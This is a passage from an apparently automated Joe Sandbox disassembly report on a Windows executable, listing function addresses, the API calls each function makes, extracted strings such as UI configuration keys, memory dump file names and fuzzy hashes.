                                                                                    • Part of subcall function 004A1F10: TlsGetValue.KERNEL32(0000001C,?,00000000,?,00000000,004A0AEA,00000065,00000000,00000104), ref: 004A1F1A
                                                                                    • Part of subcall function 004A1F10: lstrcpy.KERNEL32(00000000,00523A30), ref: 004A1F3E
                                                                                  • lstrcpyn.KERNEL32(?,00000000,?,00000104), ref: 004A0824
                                                                                  • lstrcat.KERNEL32(?,00510870), ref: 004A0845
                                                                                  • lstrcat.KERNEL32(?,?), ref: 004A0854
                                                                                  • wsprintfA.USER32 ref: 004A088A
                                                                                  • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000), ref: 004A08A9
                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000), ref: 004A08C3
                                                                                  • lstrlen.KERNEL32(?,?,00000000), ref: 004A08DB
                                                                                  • WriteFile.KERNEL32(00000000,?,00000000), ref: 004A08EA
                                                                                  • wsprintfA.USER32 ref: 004A0909
                                                                                  • lstrlen.KERNEL32(?,?,00000000), ref: 004A091A
                                                                                  • WriteFile.KERNEL32(00000000,?,00000000), ref: 004A0923
                                                                                  • WriteFile.KERNEL32(00000000,00511394,00000002,?,00000000), ref: 004A0934
                                                                                  • wsprintfA.USER32 ref: 004A0958
                                                                                  • lstrlen.KERNEL32(?,?,00000000), ref: 004A0969
                                                                                  • WriteFile.KERNEL32(00000000,?,00000000), ref: 004A0972
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004A0975
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Write$lstrlenwsprintf$Valuelstrcat$CloseCreateDirectoryHandlePointerWindowslstrcpylstrcpyn
                                                                                  • String ID: %s %d %s $%s %lx
                                                                                  • API String ID: 1992647425-4210052431
                                                                                  • Opcode ID: 7693f77cba824b88884df65a2f24c29789c625566c2737b0a1c05431334f01fc
                                                                                  • Instruction ID: ba1b719df58fea2d725c8740a7d74d246acfecf8a347b8b94f43eb98449b9622
                                                                                  • Opcode Fuzzy Hash: 7693f77cba824b88884df65a2f24c29789c625566c2737b0a1c05431334f01fc
                                                                                  • Instruction Fuzzy Hash: 0841B6B15403457FE220EB60DC86FFB77ACEB94B04F04491DBB549A1C1D7B4A909CBAA
                                                                                  Function 0045CE12 Relevance: 30.1, APIs: 1, Strings: 16, Instructions: 385COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0045CE17
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: DecrementH_prologInterlocked
                                                                                  • String ID: BDFILL$BDIMG$CAOff$CstClrs$CstFnts$FTSEP$FontData$Fonts$HDSEP$SBIMG$ScreenH$ScreenW$StyleData$TBIMG$TBTXTX$TBTXTY
                                                                                  • API String ID: 3164693477-1466213234
                                                                                  • Opcode ID: 064415b4fc323b653ac628deb598fab3ee679050dfface5d511e7d35c534c463
                                                                                  • Instruction ID: 3faa11bafb3343641d306fca7be95ec26c616e172ec0f6031a9276dbb509fa22
                                                                                  • Opcode Fuzzy Hash: 064415b4fc323b653ac628deb598fab3ee679050dfface5d511e7d35c534c463
                                                                                  • Instruction Fuzzy Hash: 2AE1A775500748EADB14EF31C885FDE7BA8AF54345F00846EB85A97283DB78EB88C794
                                                                                  Function 0045D30B Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 255COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0045D310
                                                                                    • Part of subcall function 00480008: __EH_prolog.LIBCMT ref: 0048000D
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                    • Part of subcall function 0045D7FC: __EH_prolog.LIBCMT ref: 0045D801
                                                                                    • Part of subcall function 00480127: __EH_prolog.LIBCMT ref: 0048012C
                                                                                    • Part of subcall function 0045C898: __EH_prolog.LIBCMT ref: 0045C89D
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$DecrementInterlockedlstrlen
                                                                                  • String ID: BDFILL$BDIMG$CstClrs$CstFnts$FTSEP$Fonts$HDSEP$SBIMG$ScreenH$ScreenW$StyleData$TBIMG$TBTXTX$TBTXTY
                                                                                  • API String ID: 179524303-2045141102
                                                                                  • Opcode ID: 98c3792db508c94b8b4e342b00821b9979a45836825d8cd8b34134a8fa80109e
                                                                                  • Instruction ID: 73859794f872223636a50e064826dfa6d03b05eb6e4240dc5b413476fb2a7419
                                                                                  • Opcode Fuzzy Hash: 98c3792db508c94b8b4e342b00821b9979a45836825d8cd8b34134a8fa80109e
                                                                                  • Instruction Fuzzy Hash: 7FA19274400648FEDB05EB21C891FEE7FA4AF21348F00845DF84A97192DB38A74DD7A1
                                                                                  Function 004083D8 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 241COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004083DD
                                                                                  • GetSysColor.USER32(00000014), ref: 00408407
                                                                                  • GetSysColor.USER32(00000010), ref: 0040840C
                                                                                  • GetSysColor.USER32(00000010), ref: 00408421
                                                                                  • FrameRect.USER32(?,?,?), ref: 00408444
                                                                                  • GetSysColor.USER32(00000014), ref: 00408464
                                                                                  • GetSysColor.USER32(00000016), ref: 0040847A
                                                                                  • GetSysColor.USER32(00000010), ref: 0040848D
                                                                                  • GetSysColor.USER32(00000015), ref: 004084A0
                                                                                  • GetSysColor.USER32(00000010), ref: 004084CA
                                                                                  • GetSysColor.USER32(00000014), ref: 004084CF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$FrameH_prologRect
                                                                                  • String ID: 8pN
                                                                                  • API String ID: 3885730630-1801615451
                                                                                  • Opcode ID: cc62c14bd744b624131441a2989cae57d46401ba6f43a7c36051e258d9d19cd7
                                                                                  • Instruction ID: f8d5d9dd0bb8ae4f0b4db2893dd3dae89874ea5bcc73c51c22347359cc4fe124
                                                                                  • Opcode Fuzzy Hash: cc62c14bd744b624131441a2989cae57d46401ba6f43a7c36051e258d9d19cd7
                                                                                  • Instruction Fuzzy Hash: CA815D75A00109AFDF10DFA5C985EAEBBB9EF44304F04842EF59AA6291CB34AD04DB64
                                                                                  Function 004C8A45 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 174windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 004C93E0: GetWindowLongA.USER32(?,000000F0), ref: 004C93EC
                                                                                  • GetParent.USER32(?), ref: 004C8A70
                                                                                  • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 004C8A93
                                                                                  • GetWindowRect.USER32(?,?), ref: 004C8AAC
                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 004C8ABF
                                                                                  • CopyRect.USER32(?,?), ref: 004C8B0C
                                                                                  • CopyRect.USER32(?,?), ref: 004C8B16
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004C8B1F
                                                                                  • CopyRect.USER32(?,?), ref: 004C8B3B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                  • String ID: ($@
                                                                                  • API String ID: 808654186-1311469180
                                                                                  • Opcode ID: be16caf3e0b8b41ac0f52a4977b024a8499580312520c274f66ea4a71e35eeaa
                                                                                  • Instruction ID: 3910e08b789bccc83bac65a78aa5eb1dd2426e5809b5da297576190abfef2f69
                                                                                  • Opcode Fuzzy Hash: be16caf3e0b8b41ac0f52a4977b024a8499580312520c274f66ea4a71e35eeaa
                                                                                  • Instruction Fuzzy Hash: 7C515176A00219ABCB50DBB8DC85FAEBBB9AF44314F15012EF501F7295DB34AD058B68
                                                                                  Function 00460864 Relevance: 24.2, APIs: 16, Instructions: 157windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsWindow.USER32(?), ref: 00460894
                                                                                  • GetFocus.USER32 ref: 0046089E
                                                                                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 004608D2
                                                                                  • IsWindow.USER32(?), ref: 0046090F
                                                                                  • IsWindowVisible.USER32(?), ref: 00460918
                                                                                  • IsWindowEnabled.USER32(?), ref: 00460921
                                                                                  • IsWindow.USER32(?), ref: 00460953
                                                                                  • IsWindowVisible.USER32(?), ref: 0046095C
                                                                                  • IsWindowEnabled.USER32(?), ref: 00460965
                                                                                  • IsWindow.USER32(?), ref: 0046098C
                                                                                  • IsWindowVisible.USER32(?), ref: 00460995
                                                                                  • IsWindowEnabled.USER32(?), ref: 0046099E
                                                                                  • IsWindow.USER32(?), ref: 004609C5
                                                                                  • IsWindowVisible.USER32(?), ref: 004609CE
                                                                                  • IsWindowEnabled.USER32(?), ref: 004609D7
                                                                                  • SendMessageA.USER32(?,000000F4,00000001,00000001), ref: 004609ED
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$EnabledVisible$MessageSend$Focus
                                                                                  • String ID:
                                                                                  • API String ID: 2045024204-0
                                                                                  • Opcode ID: 582e16e3577cbf14ddaf2e1444b3049222b57771f49ac2e0022d1373abeadcae
                                                                                  • Instruction ID: 905362bf8d03f47b52438668d8c8104c20f2a2c35df8240b65902b00b1b5a3c0
                                                                                  • Opcode Fuzzy Hash: 582e16e3577cbf14ddaf2e1444b3049222b57771f49ac2e0022d1373abeadcae
                                                                                  • Instruction Fuzzy Hash: CD51A3713007029FEF305F31DC54B2B76A6AF44781F15423AE941AB3A6EB29DC09CA5A
                                                                                  Function 00428804 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 476COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00428809
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                  • __ftol.LIBCMT ref: 004288F1
                                                                                  • __ftol.LIBCMT ref: 00428A07
                                                                                    • Part of subcall function 004C6033: lstrlen.KERNEL32(?,?,00000000,004C5E52,005247C8,00403DCA,00000000,00403C1B,00000000,00000000,004019FC,?), ref: 004C6044
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$__ftollstrlen
                                                                                  • String ID: 0:R$D$DefaultErrorMode$ErrorCode$ErrorMsg$NewConsole$NewProcessGroup$SeparateWOWVDM$Suspended$UnicodeEnvironment
                                                                                  • API String ID: 2052632373-2322229317
                                                                                  • Opcode ID: bef0e31a94ecbeec0dee5a79e6a852639d4606ae34685a3ee9bc36585d7d07c6
                                                                                  • Instruction ID: 86a9d5005b695a4152f2a547f711cfbb316a88eb4b6103e24efc3daf46b3735a
                                                                                  • Opcode Fuzzy Hash: bef0e31a94ecbeec0dee5a79e6a852639d4606ae34685a3ee9bc36585d7d07c6
                                                                                  • Instruction Fuzzy Hash: 27E10235906229A9DB18FBA6EC42FDE77789F15328F20011FF500B61C2EF785A85876D
                                                                                  Function 00414248 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 259COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: A bad pointer has been used.$Advapi32.dll$CreateProcessWithLogonW
                                                                                  • API String ID: 3519838083-4276160095
                                                                                  • Opcode ID: 7eef0964263b19359fe917427bcab1b1fa6ce5ccbdf1c11c78d91eb4b7e1cb82
                                                                                  • Instruction ID: b1d0f99e43904c2a0832fa948a07cdff5dcb46890749a114e5afd31a54da981c
                                                                                  • Opcode Fuzzy Hash: 7eef0964263b19359fe917427bcab1b1fa6ce5ccbdf1c11c78d91eb4b7e1cb82
                                                                                  • Instruction Fuzzy Hash: BAA17E74900219EFCF15DFA5C845BEEBBB9AF84304F14412EF112A6291DB789A80CB68
                                                                                  Function 004548A3 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 244windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004548A8
                                                                                    • Part of subcall function 00453857: IsWindow.USER32(00000000), ref: 0045386E
                                                                                  • SendMessageA.USER32(?,0000018A,?,00000000), ref: 00454931
                                                                                  • SendMessageA.USER32(?,00000189,?,00000000), ref: 00454949
                                                                                  • SendMessageA.USER32(?,00000187,?,00000000), ref: 00454963
                                                                                    • Part of subcall function 0045C50B: __EH_prolog.LIBCMT ref: 0045C510
                                                                                  • SendMessageA.USER32(?,0000018A,?,00000000), ref: 00454987
                                                                                  • SendMessageA.USER32(?,00000189,?,00000000), ref: 0045499F
                                                                                    • Part of subcall function 004C6329: lstrlen.KERNEL32(?,00000100,004C9C79,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,00000000,?), ref: 004C633C
                                                                                  • SendMessageA.USER32(?,00000187,?,00000000), ref: 004549B9
                                                                                    • Part of subcall function 0045C45C: __EH_prolog.LIBCMT ref: 0045C461
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$H_prolog$Windowlstrlen
                                                                                  • String ID: Checked$Index$Selected$Text$false$true
                                                                                  • API String ID: 2526461855-4262960588
                                                                                  • Opcode ID: 392699d910bf1621188656a7b0aebc387bf76bbe049c96ba87718edf53aa44ee
                                                                                  • Instruction ID: fb5b4e533497bf84aaa86c42b6e575238de286fac3f874d3a72acc2ad7edaa55
                                                                                  • Opcode Fuzzy Hash: 392699d910bf1621188656a7b0aebc387bf76bbe049c96ba87718edf53aa44ee
                                                                                  • Instruction Fuzzy Hash: 6691F734500644ABDB05EB76CC56FAEBBA4AF80318F10812EB4159B2D2DB78AE45CB59
                                                                                  Function 00435000 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 278windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00435005
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                    • Part of subcall function 0041F1C0: __EH_prolog.LIBCMT ref: 0041F1C5
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                  • __ftol.LIBCMT ref: 00435158
                                                                                  • ShellExecuteEx.SHELL32(?), ref: 004351F2
                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00435216
                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00435228
                                                                                  • TranslateMessage.USER32(?), ref: 00435245
                                                                                  • DispatchMessageA.USER32(?), ref: 0043524F
                                                                                  • GetExitCodeProcess.KERNEL32(?,00000000), ref: 0043527B
                                                                                  • CloseHandle.KERNEL32(?,?,00000000), ref: 00435295
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$Message$Interlocked$CloseCodeDecrementDispatchExecuteExitHandleIncrementMultipleObjectsPeekProcessShellTranslateWait__ftollstrlen
                                                                                  • String ID: 0:R$@$open
                                                                                  • API String ID: 611099473-2730137126
                                                                                  • Opcode ID: 53d758fc26a692f261c3b329c1dadd365dafefd29ef18cd5e581c041ba3c57a2
                                                                                  • Instruction ID: db3404717b671cfb4c84c1017c3320a6b6d85c20037b2e1ea01727f3ad72b46c
                                                                                  • Opcode Fuzzy Hash: 53d758fc26a692f261c3b329c1dadd365dafefd29ef18cd5e581c041ba3c57a2
                                                                                  • Instruction Fuzzy Hash: 0AA19375D04218AEDF14EBA5DC46FEEBBB8AF18714F20001FF501B61C2DB785A858B69
                                                                                  Function 004847B0 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 147COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __ftol.LIBCMT ref: 004847E7
                                                                                    • Part of subcall function 004B1FCA: GetLocalTime.KERNEL32(00000000), ref: 004B1FD7
                                                                                    • Part of subcall function 004B1FCA: GetSystemTime.KERNEL32(?), ref: 004B1FE1
                                                                                  • _wctomb_s.LIBCMT ref: 00484918
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
